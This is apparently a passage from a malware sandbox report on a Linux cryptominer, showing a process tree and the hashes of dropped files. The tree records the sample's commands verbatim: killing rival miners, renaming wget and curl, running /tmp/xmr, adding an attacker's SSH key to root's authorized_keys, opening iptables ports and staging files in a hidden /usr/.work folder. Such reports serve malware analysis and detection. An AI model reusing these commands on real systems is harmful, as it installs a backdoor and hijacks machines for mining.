                                                                                                                                                                                                                                                                                          PID:1742
                                                                                                                                                                                                                                                                                          • /usr/local/sbin/kill
                                                                                                                                                                                                                                                                                            kill -9
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:1743
                                                                                                                                                                                                                                                                                            • /usr/local/bin/kill
                                                                                                                                                                                                                                                                                              kill -9
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:1743
                                                                                                                                                                                                                                                                                              • /usr/sbin/kill
                                                                                                                                                                                                                                                                                                kill -9
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:1743
                                                                                                                                                                                                                                                                                                • /usr/bin/kill
                                                                                                                                                                                                                                                                                                  kill -9
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                  PID:1743
                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:1741
                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                  grep -v grep
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:1740
                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                    grep stratum
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:1739
                                                                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                                                                      ps -ef
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                                      PID:1738
                                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                                    sh -c "killall xmr"
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:1744
                                                                                                                                                                                                                                                                                                      • /usr/bin/killall
                                                                                                                                                                                                                                                                                                        killall xmr
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                        PID:1745
                                                                                                                                                                                                                                                                                                    • /usr/bin/sh
                                                                                                                                                                                                                                                                                                      sh -c "mv /usr/bin/wget /usr/bin/wget1&"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:1746
                                                                                                                                                                                                                                                                                                      • /usr/bin/sh
                                                                                                                                                                                                                                                                                                        sh -c "mv /usr/bin/curl /usr/bin/curl1&"
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:1748
                                                                                                                                                                                                                                                                                                        • /usr/bin/sh
                                                                                                                                                                                                                                                                                                          sh -c "chmod +x /tmp/xmr"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                          PID:1750
                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                            chmod +x /tmp/xmr
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                            PID:1751
                                                                                                                                                                                                                                                                                                        • /usr/bin/sh
                                                                                                                                                                                                                                                                                                          sh -c /tmp/xmr
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:1752
                                                                                                                                                                                                                                                                                                            • /tmp/xmr
                                                                                                                                                                                                                                                                                                              /tmp/xmr
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              • Checks hardware identifiers (DMI)
                                                                                                                                                                                                                                                                                                              • Reads hardware information
                                                                                                                                                                                                                                                                                                              • Checks CPU configuration
                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                              • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                              PID:1753
                                                                                                                                                                                                                                                                                                          • /usr/bin/sh
                                                                                                                                                                                                                                                                                                            sh -c "chmod +x /tmp/secure.sh"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                            PID:1755
                                                                                                                                                                                                                                                                                                            • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                              chmod +x /tmp/secure.sh
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                              PID:1757
                                                                                                                                                                                                                                                                                                          • /usr/bin/sh
                                                                                                                                                                                                                                                                                                            sh -c "/tmp/secure.sh&"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:1759
                                                                                                                                                                                                                                                                                                            • /usr/bin/sh
                                                                                                                                                                                                                                                                                                              sh -c "chmod +x /tmp/auth.sh"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                              • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                              PID:1763
                                                                                                                                                                                                                                                                                                              • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                chmod +x /tmp/auth.sh
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                PID:1765
                                                                                                                                                                                                                                                                                                            • /usr/bin/sh
                                                                                                                                                                                                                                                                                                              sh -c "/tmp/auth.sh&"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:1767
                                                                                                                                                                                                                                                                                                              • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                sh -c "mkdir -p /usr/.work"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:1770
                                                                                                                                                                                                                                                                                                                  • /usr/bin/mkdir
                                                                                                                                                                                                                                                                                                                    mkdir -p /usr/.work
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:1777
                                                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                    sh -c "\\cp -R /tmp/* /usr/.work/ &"
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:1779
                                                                                                                                                                                                                                                                                                                    • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                      sh -c "chmod 700 /root/.ssh/"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:1783
                                                                                                                                                                                                                                                                                                                        • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                          chmod 700 /root/.ssh/
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:1790
                                                                                                                                                                                                                                                                                                                        • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                          sh -c "echo >> /root/.ssh/authorized_keys"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                          • Adds new SSH keys
                                                                                                                                                                                                                                                                                                                          PID:1791
                                                                                                                                                                                                                                                                                                                        • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                          sh -c "chmod 600 /root/.ssh/authorized_keys"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:1793
                                                                                                                                                                                                                                                                                                                            • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                              chmod 600 /root/.ssh/authorized_keys
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:1794
                                                                                                                                                                                                                                                                                                                            • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                              sh -c "echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911\" >> /root/.ssh/authorized_keys"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                              • Adds new SSH keys
                                                                                                                                                                                                                                                                                                                              PID:1795
                                                                                                                                                                                                                                                                                                                            • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                              sh -c "iptables -I INPUT -p tcp --dport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:1796
                                                                                                                                                                                                                                                                                                                              • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                sh -c "iptables -I OUTPUT -p tcp --sport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                PID:1797
                                                                                                                                                                                                                                                                                                                              • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                sh -c "iptables -I PREROUTING -t nat -p tcp --dport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:1798
                                                                                                                                                                                                                                                                                                                                • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                  sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 8013 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                  PID:1799
                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                  sh -c "iptables -I INPUT -p udp --dport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:1800
                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sh
                                                                                                                                                                                                                                                                                                                                    sh -c "ulimit -n"
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:1801
                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                      sh -c "iptables -I OUTPUT -p udp --sport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                      PID:1803
                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                      sh -c "iptables -I PREROUTING -t nat -p udp --dport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:1804
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                        getent passwd 0
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:1805
                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                          sh -c "iptables -I POSTROUTING -t nat -p udp --sport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                          PID:1806
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                          getent passwd 0
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1817
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                            getent passwd 0
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:1818
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                              getent passwd 0
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:1824
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                                getent passwd 0
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1825
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                                  getent passwd 0
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1826
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/mv
                                                                                                                                                                                                                                                                                                                                                mv /usr/bin/wget /usr/bin/wget1
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1747
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/mv
                                                                                                                                                                                                                                                                                                                                                  mv /usr/bin/curl /usr/bin/curl1
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1749
                                                                                                                                                                                                                                                                                                                                                  • /tmp/secure.sh
                                                                                                                                                                                                                                                                                                                                                    /tmp/secure.sh
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                    PID:1761
                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/date
                                                                                                                                                                                                                                                                                                                                                      date "+%b %e %H"
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1766
                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                        grep "Dec 3 23" /var/log/secure
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1771
                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                          grep Failed
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1772
                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                            awk "{print \$(NF-3)}"
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1773
                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/sort
                                                                                                                                                                                                                                                                                                                                                              sort
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1774
                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/uniq
                                                                                                                                                                                                                                                                                                                                                                uniq -c
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1775
                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                  awk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1776
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sleep
                                                                                                                                                                                                                                                                                                                                                                    sleep 60
                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1780
                                                                                                                                                                                                                                                                                                                                                                  • /tmp/auth.sh
                                                                                                                                                                                                                                                                                                                                                                    /tmp/auth.sh
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                    PID:1769
                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/date
                                                                                                                                                                                                                                                                                                                                                                      date "+%b %e %H"
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1778
                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                        grep "Dec 3 23" /var/log/auth.log
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1784
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                          grep Failed
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1785
                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                            awk "{print \$(NF-3)}"
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1786
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/sort
                                                                                                                                                                                                                                                                                                                                                                              sort
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1787
                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/uniq
                                                                                                                                                                                                                                                                                                                                                                                uniq -c
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1788
                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                  awk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1789
                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sleep
                                                                                                                                                                                                                                                                                                                                                                                    sleep 60
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1792
                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/cp
                                                                                                                                                                                                                                                                                                                                                                                    cp -R /tmp/auth.sh /tmp/config.json /tmp/gdm3-config-err-n2WIav /tmp/secure.sh /tmp/snap-private-tmp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-ECrg2q /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar /tmp/work32 /tmp/xmr /usr/.work/
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1782

                                                                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                                                                          • /tmp/auth.sh

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            419B

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            ed583c5e843c91d8fd0752e56ccacbde

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            29ded7c69c93262842b8793d3a99868d8118364e

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            442e897c78532dd4e36fa1c7fd791c4bcf19b230d9aab3d5d12ade2d98b84a83

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            057e123d626a9cc2d5181707169e3636844856db721cd34d181712a16724538df4360d054af87b1b58505b78702fdce57836d340bab8af56c5173e9c0c735a5f

                                                                                                                                                                                                                                                                                                                                                                                          • /tmp/config.json

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            2a669d95673bc6d238399132dcf52e61

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            7497b198b549a139b3c32bffa65c3e15885b0ff2

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            b1a4c0d08ad2b8625e5a111ff70d88d0bcf4f7d712b5e7ab72747622431df18f

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            152285fd8f28c8dafd0dd3f2320b3258cbb6b621707de7486efdee710c7dcbb87fb716b181d3b4b1ac73376a3b4cb618d56d6a90213c5cbfa77a853fe9b60233

                                                                                                                                                                                                                                                                                                                                                                                          • /tmp/secure.sh

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            417B

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            b2c87016390044ebd32dcb8c52dfd8f3

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            5a246aa26f208d4c3d9f512e0f1777bc51cae68e

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            904f2c1bc6b48ba663b9186b7b04905a33af3d55afb9995802daadab83da2a15

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            9375bc9e0c0049baac8247a58526cc727e8452ec831e7abd39864a2de549cb36136ba2ff154428e2a9370ec7adfeda63d6d9bd9fa7158fc5eae852f8b035173e

                                                                                                                                                                                                                                                                                                                                                                                          • /tmp/xmr

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            20552242cd4b5e8fa6071951e9f4bf6d

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            95f8891ab0169ee8c51c39de0d3f0b974091e8fa

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            86f0e4c7596a7ac30af4152ce86268b109c325f62a7cfe1be0dbc72de0d9279a

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            1637b6742045baa9f8f16dbe5afa535324dec97abc3c5d37679c2ccca30f842ea80cbecb315925bcfce20f84dfdef4a7a978dc1986f26b9f9698665ef30e1c3a

                                                                                                                                                                                                                                                                                                                                                                                          • /usr/.work/work32

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            4.2MB

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            06e1f988471336d788da0fcaa29ed50b

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            2fa461cd8f0614dfb86f845aef47c42910370b00

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            7f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            4ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180

                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/root

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            34B

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            421de1a0dc2f268bd3aa5f563eff3901

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            eadf89c04673ae58d44bc8d02471c0fbf66e747e

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            888cf94f41403c7181b3ee7afb94278246f57b2d1b3cf078853d6ef447c2379a

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            7285223424cd7cebb5246c5f4410d4f43da83be4ed1870c9adcec58d6c650bb4d0044f806b99514f2651818cbc406479760747fcfe03c33b315d4f9a4b52d4b5